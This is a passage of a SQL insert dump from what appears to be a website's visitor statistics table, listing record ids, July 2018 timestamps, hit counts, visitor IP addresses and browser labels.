876590,5,5,0,0,'95.163.255.108','other'),(268719,1530876597,1,1,0,0,'95.163.255.113','other'),(268720,1530876607,3,3,0,0,'95.163.255.115','other'),(268721,1530876626,3,3,0,0,'95.163.255.106','other'),(268722,1530876635,1,1,0,0,'95.163.255.118','other'),(268723,1530876646,1,1,0,0,'95.163.255.107','other'),(268724,1530876656,1,1,0,0,'95.163.255.104','other'),(268725,1530876665,2,2,0,0,'95.163.255.112','other'),(268726,1530876715,1,1,0,0,'95.163.255.103','other'),(268727,1530876725,1,1,0,0,'95.163.255.117','other'),(268728,1530876731,7,7,0,0,'216.244.66.241','other'),(268729,1530876761,2,2,0,0,'95.163.255.114','other'),(268730,1530876776,3,3,0,0,'95.163.255.116','other'),(268731,1530876846,2,2,0,0,'95.163.255.109','other'),(268732,1530876855,1,1,0,0,'89.179.107.50','msie'),(268733,1530876901,1,1,0,0,'95.163.255.102','other'),(268734,1530877054,1,1,0,0,'54.36.148.108','other'),(268735,1530877150,1,1,0,0,'54.36.148.159','other'),(268736,1530877170,1,1,0,0,'66.249.69.187','chrome'),(268737,1530877172,1,1,0,0,'66.249.69.230','chrome'),(268738,1530877246,1,1,0,0,'54.36.149.18','other'),(268739,1530877357,2,2,0,0,'194.44.231.183','firefox'),(268740,1530877416,1,1,0,0,'54.36.149.96','other'),(268741,1530877491,1,1,0,0,'46.219.239.137','chrome'),(268742,1530877729,1,1,0,0,'54.36.148.68','other'),(268743,1530877737,1,1,0,0,'8.29.198.27','other'),(268744,1530877788,1,1,0,0,'54.36.148.12','other'),(268745,1530877905,1,1,0,0,'91.209.11.236','other'),(268746,1530878052,1,1,0,0,'91.196.178.130','chrome'),(268747,1530878061,2,2,0,0,'95.163.255.94','other'),(268748,1530878142,1,1,0,0,'54.36.148.53','other'),(268749,1530878428,1,1,0,0,'54.36.149.104','other'),(268750,1530878567,1,1,0,0,'95.163.255.157','other'),(268751,1530878644,1,1,0,0,'46.201.227.188','chrome'),(268752,1530878664,1,1,0,0,'54.36.148.127','other'),(268753,1530878710,1,1,0,0,'54.36.148.167','other'),(268754,1530878726,1,1,0,0,'95.163.255.185','other'),(268755,1530879111,1,0,1,0,'66.249.69.228',''),(268756,1530879134,3,3,0,0,'216.244.66.241','other'),(268757,1530879467,2,2,0,0,'95.134.202.81','chrome'),(268758,1530879515,1,0,1,0,'66.249.69.232',''),(268759,1530879677,1,1,0,0,'54.36.148.229','other'),(268760,1530880172,1,1,0,0,'91.196.178.94','chrome'),(268761,1530880796,1,1,0,0,'54.36.148.42','other'),(268762,1530880803,1,1,0,0,'157.55.39.97','other'),(268763,1530880888,2,0,2,0,'66.249.69.232',''),(268764,1530880903,1,1,0,0,'66.249.69.230','chrome'),(268765,1530881229,1,1,0,0,'54.36.148.225','other'),(268766,1530881387,1,1,0,0,'54.36.148.124','other'),(268767,1530881517,3,3,0,0,'216.244.66.241','other'),(268768,1530881567,1,1,0,0,'54.36.148.126','other'),(268769,1530881884,2,2,0,0,'144.76.91.79','other'),(268770,1530881947,1,1,0,0,'8.29.198.26','other'),(268771,1530882009,1,1,0,0,'66.249.69.187','chrome'),(268772,1530882496,3,3,0,0,'216.244.66.241','other'),(268773,1530882628,1,1,0,0,'54.36.149.95','other'),(268774,1530882835,1,1,0,0,'146.185.185.122','chrome'),(268775,1530882869,1,1,0,0,'54.36.148.44','other'),(268776,1530883382,1,1,0,0,'180.76.15.135','other'),(268777,1530883457,1,1,0,0,'54.36.148.119','other'),(268778,1530883679,2,2,0,0,'95.163.255.97','other'),(268779,1530883836,2,2,0,0,'95.163.255.94','other'),(268780,1530883845,1,1,0,0,'95.163.255.98','other'),(268781,1530883900,1,1,0,0,'95.163.255.99','other'),(268782,1530883976,1,1,0,0,'95.163.255.96','other'),(268783,1530884976,5,5,0,0,'216.244.66.241','other'),(268784,1530885823,1,1,0,0,'66.249.69.189','chrome'),(268785,1530886009,1,1,0,0,'54.36.148.22','other'),(268786,1530886243,1,1,0,0,'157.55.39.97','other'),(268787,1530886768,2,2,0,0,'91.196.178.176','chrome'),(268788,1530886831,1,1,0,0,'54.36.148.29','other'),(268789,1530887060,1,0,1,0,'66.249.69.228',''),(268790,1530887586,1,1,0,0,'54.36.148.25','other'),(268791,1530887783,3,3,0,0,'216.244.66.241','other'),(268792,1530887936,1,1,0,0,'54.36.148.231','other'),(268793,1530888265,1,1,0,0,'46.133.32.144','chrome'),(268794,1530888357,1,1,0,0,'66.249.69.185','chrome'),(268795,1530888490,1,1,0,0,'91.226.57.230','other'),(268796,1530888577,1,1,0,0,'8.29.198.26','other'),(268797,1530888624,1,1,0,0,'54.36.149.20','other'),(268798,1530888637,1,1,0,0,'157.55.39.102','other'),(268799,1530888808,1,1,0,0,'66.249.69.232','chrome'),(268800,1530888812,1,1,0,0,'54.36.148.78','other'),(268801,1530888985,1,1,0,0,'54.236.211.234','other'),(268802,1530889182,1,1,0,0,'54.36.148.95','other'),(268803,1530889436,1,1,0,0,'95.163.255.177','other'),(268804,1530889906,1,1,0,0,'54.36.149.23','other'),(268805,1530889929,1,1,0,0,'95.163.255.98','other'),(268806,1530889992,1,1,0,0,'157.55.39.102','other'),(268807,1530890322,1,1,0,0,'54.36.149.76','other'),(268808,1530890372,5,5,0,0,'216.244.66.241','other'),(268809,1530890777,1,1,0,0,'54.36.149.6','other'),(268810,1530890807,1,1,0,0,'54.36.148.220','other'),(268811,1530890941,1,1,0,0,'91.196.178.129','chrome'),(268812,1530891060,1,1,0,0,'23.101.169.3','msie'),(268813,1530891134,1,1,0,0,'54.36.149.97','other'),(268814,1530891216,1,1,0,0,'66.249.69.187','chrome'),(268815,1530891546,3,3,0,0,'92.113.189.235','chrome'),(268816,1530891635,1,0,1,0,'66.249.69.185',''),(268817,1530891798,1,1,0,0,'54.236.211.234','other'),(268818,1530891913,1,1,0,0,'54.36.148.156','other'),(268819,1530891954,1,1,0,0,'54.36.148.32','other'),(268820,1530892119,1,1,0,0,'66.249.69.230','chrome'),(268821,1530892255,1,1,0,0,'54.36.148.107','other'),(268822,1530892485,2,2,0,0,'216.244.66.241','other'),(268823,1530892536,1,0,1,0,'66.249.69.232',''),(268824,1530892779,1,1,0,0,'54.36.148.204','other'),(268825,1530892784,1,1,0,0,'8.29.198.27','other'),(268826,1530892983,1,1,0,0,'54.36.149.72','other'),(268827,1530892996,1,1,0,0,'54.36.148.46','other'),(268828,1530893167,1,1,0,0,'54.36.148.248','other'),(268829,1530893184,1,1,0,0,'66.249.69.187','chrome'),(268830,1530893204,20,20,0,0,'80.241.211.186','other'),(268831,1530893208,1,1,0,0,'66.249.69.230','chrome'),(268832,1530893468,3,3,0,0,'216.244.66.241','other'),(268833,1530893800,1,1,0,0,'54.36.149.105','other'),(268834,1530893985,1,1,0,0,'54.224.108.120','other'),(268835,1530893992,3,0,3,0,'66.249.69.228',''),(268836,1530894030,1,1,0,0,'54.36.149.1','other'),(268837,1530894084,1,1,0,0,'193.106.30.99','firefox'),(268838,1530894244,1,1,0,0,'54.36.148.111','other'),(268839,1530894699,1,1,0,0,'95.163.255.94','other'),(268840,1530894702,1,1,0,0,'95.163.255.99','other'),(268841,1530894707,1,1,0,0,'54.36.148.64','other'),(268842,1530894892,1,1,0,0,'54.36.149.5','other'),(268843,1530894895,1,1,0,0,'95.163.255.98','other'),(268844,1530894896,2,2,0,0,'95.163.255.96','other'),(268845,1530894910,2,0,2,0,'66.249.69.232',''),(268846,1530894968,1,1,0,0,'95.163.255.97','other'),(268847,1530895241,1,1,0,0,'95.163.255.179','other'),(268848,1530895314,1,1,0,0,'64.246.165.160','firefox'),(268849,1530895319,1,1,0,0,'213.180.203.8','other'),(268850,1530895427,1,1,0,0,'54.36.148.11','other'),(268851,1530895436,2,2,0,0,'37.9.113.182','other'),(268852,1530895522,1,1,0,0,'141.8.142.74','other'),(268853,1530895624,3,3,0,0,'178.154.171.88','other'),(268854,1530895686,1,1,0,0,'54.36.149.24','other'),(268855,1530896010,1,1,0,0,'54.36.148.141','other'),(268856,1530896102,2,0,2,0,'66.249.69.230',''),(268857,1530896105,2,0,2,0,'66.249.69.228',''),(268858,1530896205,4,4,0,0,'216.244.66.241','other'),(268859,1530896288,1,1,0,0,'91.196.178.94','firefox'),(268860,1530896293,1,1,0,0,'87.250.224.46','other'),(268861,1530896328,1,1,0,0,'54.224.108.120','other'),(268862,1530896644,1,1,0,0,'54.36.148.217','other'),(268863,1530896857,1,1,0,0,'37.9.113.110','other'),(268864,1530896950,1,1,0,0,'37.9.113.182','other'),(268865,1530897112,1,1,0,0,'141.8.142.74','other'),(268866,1530897152,1,1,0,0,'216.244.66.241','other'),(268867,1530897168,1,1,0,0,'54.36.148.225','other'),(268868,1530897171,2,0,2,0,'66.249.69.232',''),(268869,1530897418,1,1,0,0,'54.36.148.241','other'),(268870,1530897596,1,1,0,0,'54.36.149.72','other'),(268871,1530897598,1,1,0,0,'54.36.149.70','other'),(268872,1530897670,5,5,0,0,'178.95.244.97','chrome'),(268873,1530897719,1,1,0,0,'54.36.149.50','other'),(268874,1530897846,2,2,0,0,'178.154.171.88','other'),(268875,1530898352,1,1,0,0,'54.36.148.252','other'),(268876,1530898467,1,1,0,0,'54.36.148.170','other'),(268877,1530898485,1,1,0,0,'54.36.148.209','other'),(268878,1530898637,1,0,1,0,'66.249.69.232',''),(268879,1530898721,1,1,0,0,'87.250.224.46','other'),(268880,1530898786,1,1,0,0,'37.9.113.182','other'),(268881,1530898787,4,4,0,0,'141.8.142.74','other'),(268882,1530898790,1,1,0,0,'23.101.169.3','msie'),(268883,1530898996,1,1,0,0,'54.36.148.45','other'),(268884,1530899183,2,0,2,0,'66.249.69.230',''),(268885,1530899216,1,1,0,0,'216.244.66.241','other'),(268886,1530899403,1,0,1,0,'66.249.69.228',''),(268887,1530899418,1,1,0,0,'8.29.198.25','other'),(268888,1530899560,1,0,1,0,'66.249.69.232',''),(268889,1530899834,1,1,0,0,'37.9.113.110','other'),(268890,1530900245,2,2,0,0,'95.163.255.94','other'),(268891,1530900274,1,1,0,0,'141.8.142.74','other'),(268892,1530900297,1,1,0,0,'178.92.238.34','chrome'),(268893,1530900358,1,0,1,0,'66.249.69.230',''),(268894,1530900588,2,2,0,0,'178.154.171.88','other'),(268895,1530900593,1,1,0,0,'54.36.148.71','other'),(268896,1530900664,1,1,0,0,'54.36.149.7','other'),(268897,1530900728,1,1,0,0,'95.163.255.92','other'),(268898,1530900934,3,3,0,0,'216.244.66.241','other'),(268899,1530901063,1,1,0,0,'95.163.255.95','other'),(268900,1530901436,3,0,3,0,'66.249.69.242',''),(268901,1530901522,1,1,0,0,'178.154.171.88','other'),(268902,1530901572,1,1,0,0,'23.101.169.3','msie'),(268903,1530901583,2,2,0,0,'87.250.224.46','other'),(268904,1530901623,1,1,0,0,'37.9.113.182','other'),(268905,1530901663,3,0,3,0,'66.249.69.240',''),(268906,1530901708,1,1,0,0,'54.36.148.248','other'),(268907,1530901878,3,3,0,0,'216.244.66.241','other'),(268908,1530902107,1,1,0,0,'95.132.36.42','chrome'),(268909,1530902197,1,1,0,0,'54.36.149.3','other'),(268910,1530902286,3,3,0,0,'91.196.178.43','chrome'),(268911,1530902504,1,1,0,0,'54.36.148.54','other'),(268912,1530902630,2,2,0,0,'141.8.142.74','other'),(268913,1530903138,1,1,0,0,'54.36.148.60','other'),(268914,1530903211,1,1,0,0,'37.73.149.140','chrome'),(268915,1530903420,1,1,0,0,'54.36.148.38','other'),(268916,1530903554,4,4,0,0,'141.8.142.74','other'),(268917,1530903557,1,1,0,0,'66.249.69.189','chrome'),(268918,1530903559,1,1,0,0,'66.249.69.232','chrome'),(268919,1530903561,1,1,0,0,'54.36.149.12','other'),(268920,1530903622,1,1,0,0,'8.29.198.27','other'),(268921,1530903808,1,1,0,0,'54.36.149.0','other'),(268922,1530904217,2,2,0,0,'216.244.66.241','other'),(268923,1530904350,3,3,0,0,'178.154.171.88','other'),(268924,1530904450,1,1,0,0,'91.196.178.133','firefox'),(268925,1530904554,1,1,0,0,'40.77.167.138','other'),(268926,1530904663,1,1,0,0,'54.36.148.253','other'),(268927,1530904839,1,1,0,0,'54.224.108.120','other'),(268928,1530904927,1,0,1,0,'66.249.69.232',''),(268929,1530904958,1,1,0,0,'23.101.169.3','msie'),(268930,1530905044,1,1,0,0,'54.36.149.77','other'),(268931,1530905128,2,0,2,0,'66.249.69.228',''),(268932,1530905161,1,1,0,0,'216.244.66.241','other'),(268933,1530905230,2,2,0,0,'141.8.142.74','other'),(268934,1530905501,1,1,0,0,'54.36.149.56','other'),(268935,1530905873,1,1,0,0,'54.36.148.46','other'),(268936,1530905887,1,1,0,0,'95.163.255.99','other'),(268937,1530906000,1,1,0,0,'54.36.148.50','other'),(268938,1530906001,2,0,2,0,'66.249.69.230',''),(268939,1530906084,1,1,0,0,'95.163.255.92','other'),(268940,1530906099,1,0,1,0,'66.249.69.228',''),(268941,1530906159,1,1,0,0,'141.8.142.74','other'),(268942,1530906234,1,1,0,0,'54.36.148.10','other'),(268943,1530906305,1,1,0,0,'87.250.224.46','other'),(268944,1530906789,1,1,0,0,'54.36.148.61','other'),(268945,1530906825,1,1,0,0,'54.36.148.247','other'),(268946,1530906849,3,0,3,0,'66.249.69.232',''),(268947,1530906860,1,1,0,0,'91.196.178.93','firefox'),(268948,1530906881,1,1,0,0,'54.36.148.163','other'),(268949,1530906998,3,3,0,0,'178.154.171.88','other'),(268950,1530907186,4,4,0,0,'216.244.66.241','other'),(268951,1530907201,1,1,0,0,'54.36.149.20','other'),(268952,1530907219,1,1,0,0,'66.249.69.185','chrome'),(268953,1530907220,1,1,0,0,'66.249.69.230','chrome'),(268954,1530907529,1,1,0,0,'54.36.148.68','other'),(268955,1530907579,2,0,2,0,'66.249.69.228',''),(268956,1530907695,1,1,0,0,'54.36.148.53','other'),(268957,1530907748,1,1,0,0,'54.36.149.8','other'),(268958,1530907884,5,5,0,0,'141.8.142.74','other'),(268959,1530907933,3,3,0,0,'178.154.171.88','other'),(268960,1530908004,2,0,2,0,'66.249.69.232',''),(268961,1530908018,2,2,0,0,'87.250.224.46','other'),(268962,1530908149,2,2,0,0,'216.244.66.241','other'),(268963,1530908653,1,0,1,0,'66.249.69.189',''),(268964,1530908817,1,1,0,0,'54.36.148.133','other'),(268965,1530908860,1,1,0,0,'178.154.171.88','other'),(268966,1530908941,2,2,0,0,'141.8.142.74','other'),(268967,1530908945,1,1,0,0,'54.36.149.70','other'),(268968,1530909257,1,1,0,0,'54.36.148.185','other'),(268969,1530909332,1,1,0,0,'54.36.148.21','other'),(268970,1530909541,1,1,0,0,'157.55.39.100','other'),(268971,1530909860,1,1,0,0,'141.8.142.74','other'),(268972,1530909872,1,1,0,0,'178.154.171.88','other'),(268973,1530909891,1,1,0,0,'54.36.148.170','other'),(268974,1530910128,2,2,0,0,'178.92.241.112','chrome'),(268975,1530910189,1,1,0,0,'54.36.149.80','other'),(268976,1530910212,1,1,0,0,'54.36.148.56','other'),(268977,1530910257,1,1,0,0,'8.29.198.25','other'),(268978,1530910291,3,0,3,0,'66.249.69.232',''),(268979,1530910346,2,0,2,0,'66.249.69.230',''),(268980,1530910468,1,1,0,0,'54.36.148.75','other'),(268981,1530910567,1,0,1,0,'66.249.69.228',''),(268982,1530910638,3,3,0,0,'216.244.66.241','other'),(268983,1530910896,1,1,0,0,'54.36.148.48','other'),(268984,1530911016,1,0,1,0,'66.249.69.185',''),(268985,1530911098,1,1,0,0,'95.163.255.196','other'),(268986,1530911168,1,1,0,0,'54.36.148.231','other'),(268987,1530911175,1,1,0,0,'66.249.69.189','chrome'),(268988,1530911176,1,1,0,0,'66.249.69.230','chrome'),(268989,1530911404,1,1,0,0,'95.163.255.192','other'),(268990,1530911502,3,3,0,0,'141.8.142.74','other'),(268991,1530911806,1,1,0,0,'54.36.148.253','other'),(268992,1530911832,1,1,0,0,'178.154.171.88','other'),(268993,1530911890,1,1,0,0,'66.249.69.185','chrome'),(268994,1530912066,2,0,2,0,'66.249.69.232',''),(268995,1530912076,1,1,0,0,'95.163.255.97','other'),(268996,1530912107,2,1,1,0,'66.249.69.228',''),(268997,1530912122,1,0,1,0,'66.249.69.189',''),(268998,1530912307,1,1,0,0,'173.252.99.185','other'),(268999,1530912507,1,0,1,0,'66.249.69.230',''),(269000,1530912566,1,0,1,0,'66.249.69.187',''),(269001,1530912591,1,1,0,0,'54.36.149.19','other'),(269002,1530912640,2,2,0,0,'37.9.113.182','other'),(269003,1530912772,2,2,0,0,'216.244.66.241','other'),(269004,1530912860,4,4,0,0,'95.216.0.38','other'),(269005,1530913191,1,1,0,0,'54.36.148.48','other'),(269006,1530913237,1,1,0,0,'54.36.149.74','other'),(269007,1530913310,1,1,0,0,'54.36.148.184','other'),(269008,1530913325,1,1,0,0,'54.36.148.210','other'),(269009,1530913385,1,1,0,0,'37.9.113.60','other'),(269010,1530913387,1,1,0,0,'178.154.171.4','other'),(269011,1530913406,2,2,0,0,'178.154.171.88','other'),(269012,1530913429,1,1,0,0,'141.8.142.96','other'),(269013,1530913431,1,1,0,0,'87.250.224.77','other'),(269014,1530913516,1,1,0,0,'54.36.148.49','other'),(269015,1530913726,1,1,0,0,'54.36.149.107','other'),(269016,1530913790,1,1,0,0,'54.36.148.172','other'),(269017,1530913902,1,0,1,0,'66.249.69.187',''),(269018,1530914071,1,1,0,0,'54.36.149.53','other'),(269019,1530914402,1,1,0,0,'54.36.149.65','other'),(269020,1530914470,1,1,0,0,'8.29.198.27','other'),(269021,1530914634,1,1,0,0,'54.36.148.170','other'),(269022,1530914663,1,1,0,0,'54.36.149.13','other'),(269023,1530914924,1,1,0,0,'54.36.148.192','other'),(269024,1530914977,1,1,0,0,'54.36.149.75','other'),(269025,1530915036,1,1,0,0,'141.8.142.74','other'),(269026,1530915169,1,1,0,0,'54.36.149.57','other'),(269027,1530915376,1,1,0,0,'178.154.171.88','other'),(269028,1530915540,1,1,0,0,'54.36.148.51','other'),(269029,1530915730,1,1,0,0,'54.36.149.87','other'),(269030,1530915738,1,1,0,0,'193.106.30.99','firefox'),(269031,1530915890,1,1,0,0,'54.36.149.31','other'),(269032,1530916025,1,1,0,0,'216.244.66.241','other'),(269033,1530916358,1,1,0,0,'178.154.171.88','other'),(269034,1530916367,1,1,0,0,'54.36.148.52','other'),(269035,1530916392,1,1,0,0,'54.36.149.44','other'),(269036,1530916528,1,1,0,0,'54.36.148.224','other'),(269037,1530916585,1,1,0,0,'54.36.148.232','other'),(269038,1530916770,1,1,0,0,'54.36.149.48','other'),(269039,1530916803,1,1,0,0,'95.163.255.150','other'),(269040,1530916823,1,1,0,0,'95.163.255.193','other'),(269041,1530916839,1,1,0,0,'95.163.255.96','other'),(269042,1530916955,1,1,0,0,'95.163.255.97','other'),(269043,1530917345,1,1,0,0,'95.163.255.95','other'),(269044,1530917766,1,1,0,0,'54.36.149.6','other'),(269045,1530917785,1,1,0,0,'54.36.148.233','other'),(269046,1530917918,1,1,0,0,'54.36.148.43','other'),(269047,1530917932,2,2,0,0,'141.8.142.74','other'),(269048,1530918365,1,1,0,0,'54.36.149.88','other'),(269049,1530918726,1,1,0,0,'54.36.148.188','other'),(269050,1530918841,1,1,0,0,'54.36.148.154','other'),(269051,1530918950,1,1,0,0,'54.36.149.18','other'),(269052,1530919082,4,4,0,0,'216.244.66.241','other'),(269053,1530919330,1,0,1,0,'66.249.69.189',''),(269054,1530919542,1,1,0,0,'54.36.148.179','other'),(269055,1530919598,1,1,0,0,'95.163.255.108','other'),(269056,1530919664,1,1,0,0,'54.36.148.17','other'),(269057,1530919810,1,1,0,0,'95.163.255.105','other'),(269058,1530919937,1,1,0,0,'95.163.255.115','other'),(269059,1530920046,1,1,0,0,'95.163.255.119','other'),(269060,1530920672,2,2,0,0,'157.55.39.100','other'),(269061,1530920676,3,3,0,0,'157.55.39.97','other'),(269062,1530920865,1,1,0,0,'37.9.113.182','other'),(269063,1530921003,3,3,0,0,'87.250.224.46','other'),(269064,1530921007,2,2,0,0,'178.154.171.88','other'),(269065,1530921117,1,1,0,0,'8.29.198.26','other'),(269066,1530921183,1,1,0,0,'141.8.142.74','other'),(269067,1530921213,3,3,0,0,'216.244.66.241','other'),(269068,1530921609,1,1,0,0,'66.249.69.232','chrome'),(269069,1530921631,1,0,1,0,'66.249.69.228',''),(269070,1530921697,1,1,0,0,'66.249.69.189','chrome'),(269071,1530921698,2,1,1,0,'66.249.69.228',''),(269072,1530921709,1,1,0,0,'54.36.148.165','other'),(269073,1530921895,1,1,0,0,'54.36.148.243','other'),(269074,1530922204,1,1,0,0,'95.163.255.159','other'),(269075,1530922719,1,0,1,0,'66.249.69.185',''),(269076,1530922752,2,2,0,0,'178.154.171.88','other'),(269077,1530922812,3,3,0,0,'141.8.142.74','other'),(269078,1530922996,1,1,0,0,'54.36.148.57','other'),(269079,1530923045,1,1,0,0,'54.36.148.66','other'),(269080,1530923051,1,0,1,0,'66.249.69.189',''),(269081,1530923060,1,0,1,0,'66.249.69.228',''),(269082,1530923208,1,1,0,0,'95.163.255.97','other'),(269083,1530923449,1,1,0,0,'54.36.148.27','other'),(269084,1530923467,1,1,0,0,'54.165.59.7','other'),(269085,1530923544,1,1,0,0,'37.9.113.182','other'),(269086,1530923616,1,1,0,0,'54.36.148.65','other'),(269087,1530923770,1,0,1,0,'66.249.69.232',''),(269088,1530923853,1,0,1,0,'66.249.69.230',''),(269089,1530924172,1,1,0,0,'54.36.149.26','other'),(269090,1530924230,1,0,1,0,'66.249.69.187',''),(269091,1530924520,2,2,0,0,'141.8.142.74','other'),(269092,1530924549,3,3,0,0,'54.165.59.7','other'),(269093,1530924578,2,2,0,0,'178.154.171.88','other'),(269094,1530924639,7,7,0,0,'216.244.66.241','other'),(269095,1530924766,1,1,0,0,'54.36.148.147','other'),(269096,1530924972,1,1,0,0,'180.76.15.12','other'),(269097,1530924994,1,0,1,0,'66.249.69.230',''),(269098,1530925312,1,1,0,0,'8.29.198.27','other'),(269099,1530925359,1,1,0,0,'54.36.148.204','other'),(269100,1530925445,1,1,0,0,'54.36.148.142','other'),(269101,1530925489,2,2,0,0,'54.165.59.7','other'),(269102,1530925508,1,0,1,0,'66.249.69.187',''),(269103,1530925534,1,1,0,0,'54.36.148.23','other'),(269104,1530925725,2,0,2,0,'66.249.69.228',''),(269105,1530925819,1,1,0,0,'54.36.148.169','other'),(269106,1530926123,1,1,0,0,'54.36.149.99','other'),(269107,1530926233,1,1,0,0,'141.8.142.74','other'),(269108,1530926439,1,1,0,0,'178.154.171.88','other'),(269109,1530926485,1,1,0,0,'54.36.148.75','other'),(269110,1530926586,1,0,1,0,'66.249.69.185',''),(269111,1530926747,2,0,2,0,'66.249.69.228',''),(269112,1530926929,1,0,1,0,'66.249.69.230',''),(269113,1530926992,1,1,0,0,'54.36.148.171','other'),(269114,1530927288,1,1,0,0,'54.36.149.22','other'),(269115,1530927699,2,2,0,0,'216.244.66.241','other'),(269116,1530927815,1,1,0,0,'95.163.255.170','other'),(269117,1530928033,3,2,1,0,'66.249.69.228',''),(269118,1530928037,1,1,0,0,'95.163.255.183','other'),(269119,1530928039,1,0,1,0,'66.249.69.189',''),(269120,1530928238,1,1,0,0,'95.163.255.197','other'),(269121,1530928270,4,1,3,0,'66.249.69.230',''),(269122,1530928334,4,4,0,0,'95.163.255.99','other'),(269123,1530928657,2,2,0,0,'141.8.142.74','other'),(269124,1530928687,1,0,1,0,'66.249.69.185',''),(269125,1530928741,1,1,0,0,'54.36.148.248','other'),(269126,1530928774,1,1,0,0,'54.36.149.89','other'),(269127,1530929035,1,1,0,0,'54.36.149.46','other'),(269128,1530929062,1,1,0,0,'66.249.69.187','chrome'),(269129,1530929063,2,1,1,0,'66.249.69.228',''),(269130,1530929082,1,1,0,0,'37.9.113.100','other'),(269131,1530929092,1,1,0,0,'54.36.149.66','other'),(269132,1530929665,1,1,0,0,'54.36.148.210','other'),(269133,1530929690,1,1,0,0,'54.36.148.214','other'),(269134,1530929740,1,1,0,0,'94.23.29.127','firefox'),(269135,1530929862,1,1,0,0,'54.36.149.60','other'),(269136,1530929981,2,0,2,0,'66.249.69.228',''),(269137,1530930071,5,5,0,0,'216.244.66.241','other'),(269138,1530930100,1,1,0,0,'157.55.39.102','other'),(269139,1530930157,1,1,0,0,'54.36.148.209','other'),(269140,1530930521,1,0,1,0,'66.249.69.232',''),(269141,1530930547,2,2,0,0,'66.249.69.230','chrome'),(269142,1530930627,1,1,0,0,'54.36.149.43','other'),(269143,1530930733,1,1,0,0,'54.36.148.231','other'),(269144,1530930872,1,1,0,0,'54.36.148.125','other'),(269145,1530931139,1,1,0,0,'54.36.148.208','other'),(269146,1530931250,1,1,0,0,'54.36.148.112','other'),(269147,1530931273,3,3,0,0,'178.154.171.88','other'),(269148,1530931319,1,1,0,0,'141.8.142.74','other'),(269149,1530931344,1,1,0,0,'37.9.113.114','other'),(269150,1530931421,1,1,0,0,'54.36.148.184','other'),(269151,1530931566,1,1,0,0,'54.36.148.37','other'),(269152,1530931910,2,2,0,0,'92.113.189.235','chrome'),(269153,1530931933,1,1,0,0,'54.36.148.221','other'),(269154,1530931951,1,1,0,0,'8.29.198.25','other'),(269155,1530931973,1,1,0,0,'54.36.149.80','other'),(269156,1530932173,1,1,0,0,'54.36.148.113','other'),(269157,1530932747,1,0,1,0,'66.249.69.230',''),(269158,1530932941,1,1,0,0,'95.163.255.171','other'),(269159,1530933102,1,1,0,0,'54.36.149.102','other'),(269160,1530933148,1,1,0,0,'54.36.149.34','other'),(269161,1530933278,2,2,0,0,'141.8.142.74','other'),(269162,1530933402,3,3,0,0,'216.244.66.241','other'),(269163,1530933538,1,0,1,0,'66.249.69.185',''),(269164,1530933653,1,1,0,0,'54.36.148.254','other'),(269165,1530933768,1,0,1,0,'66.249.69.246',''),(269166,1530933899,1,1,0,0,'95.163.255.92','other'),(269167,1530933905,1,1,0,0,'95.163.255.93','other'),(269168,1530933936,1,1,0,0,'95.163.255.94','other'),(269169,1530934016,1,0,1,0,'66.249.69.230',''),(269170,1530934033,1,1,0,0,'54.36.149.19','other'),(269171,1530934229,1,0,1,0,'66.249.69.228',''),(269172,1530934295,1,1,0,0,'54.36.148.13','other'),(269173,1530934662,1,1,0,0,'54.36.148.75','other'),(269174,1530934964,46,46,0,0,'94.154.239.69','other'),(269175,1530935077,1,1,0,0,'54.36.148.228','other'),(269176,1530935181,2,1,1,0,'66.249.69.232',''),(269177,1530935201,1,1,0,0,'141.8.142.74','other'),(269178,1530935624,3,3,0,0,'216.244.66.241','other'),(269179,1530935901,1,0,1,0,'66.249.69.189',''),(269180,1530936045,1,1,0,0,'66.249.69.189','chrome'),(269181,1530936046,1,1,0,0,'66.249.69.232','chrome'),(269182,1530936149,1,1,0,0,'8.29.198.26','other'),(269183,1530936525,1,1,0,0,'54.36.148.214','other'),(269184,1530936751,1,0,1,0,'66.249.69.187',''),(269185,1530936783,1,1,0,0,'178.154.171.88','other'),(269186,1530936855,1,1,0,0,'216.244.66.241','other'),(269187,1530936879,2,2,0,0,'141.8.142.74','other'),(269188,1530937081,1,1,0,0,'54.36.148.94','other'),(269189,1530937356,1,1,0,0,'193.106.30.99','firefox'),(269190,1530937648,1,1,0,0,'54.36.149.4','other'),(269191,1530937866,1,1,0,0,'54.36.149.77','other'),(269192,1530938260,1,1,0,0,'54.36.149.59','other'),(269193,1530938420,1,1,0,0,'95.163.255.180','other'),(269194,1530938614,1,1,0,0,'178.154.171.88','other'),(269195,1530938817,1,1,0,0,'95.163.255.154','other'),(269196,1530938828,1,1,0,0,'54.36.149.58','other'),(269197,1530938981,1,1,0,0,'54.36.148.99','other'),(269198,1530939216,1,1,0,0,'141.8.142.74','other'),(269199,1530939717,3,0,3,0,'66.249.69.228',''),(269200,1530939907,1,1,0,0,'54.36.148.152','other'),(269201,1530939939,1,1,0,0,'54.36.149.32','other'),(269202,1530939971,1,1,0,0,'54.36.148.26','other'),(269203,1530940078,1,0,1,0,'66.249.69.232',''),(269204,1530940112,1,1,0,0,'54.36.148.33','other'),(269205,1530940431,1,1,0,0,'54.36.149.21','other'),(269206,1530940505,1,1,0,0,'54.36.149.23','other'),(269207,1530940552,1,1,0,0,'54.36.148.84','other'),(269208,1530940687,2,2,0,0,'141.8.142.74','other'),(269209,1530940698,1,0,1,0,'66.249.69.230',''),(269210,1530940754,1,0,1,0,'66.249.69.189',''),(269211,1530941018,1,1,0,0,'216.244.66.241','other'),(269212,1530941065,1,1,0,0,'54.36.148.192','other'),(269213,1530941639,1,1,0,0,'54.36.149.58','other'),(269214,1530941942,1,1,0,0,'54.36.148.216','other'),(269215,1530942044,1,1,0,0,'216.244.66.241','other'),(269216,1530942078,1,1,0,0,'54.36.148.190','other'),(269217,1530942101,2,2,0,0,'87.250.224.46','other'),(269218,1530942144,1,1,0,0,'54.36.149.71','other'),(269219,1530942400,2,0,2,0,'66.249.69.187',''),(269220,1530942429,1,1,0,0,'54.36.148.188','other'),(269221,1530942548,1,0,1,0,'66.249.69.185',''),(269222,1530942625,3,3,0,0,'178.154.171.88','other'),(269223,1530942648,1,1,0,0,'178.154.200.41','other'),(269224,1530942783,1,1,0,0,'8.29.198.26','other'),(269225,1530943111,1,1,0,0,'54.36.148.144','other'),(269226,1530943511,1,0,1,0,'66.249.69.187',''),(269227,1530943567,1,1,0,0,'54.36.148.68','other'),(269228,1530943858,1,1,0,0,'95.163.255.183','other'),(269229,1530944084,2,2,0,0,'141.8.142.74','other'),(269230,1530944429,1,1,0,0,'54.36.148.220','other'),(269231,1530944484,1,1,0,0,'54.36.148.252','other'),(269232,1530944736,2,2,0,0,'216.244.66.241','other'),(269233,1530944895,1,1,0,0,'178.154.171.88','other'),(269234,1530944910,1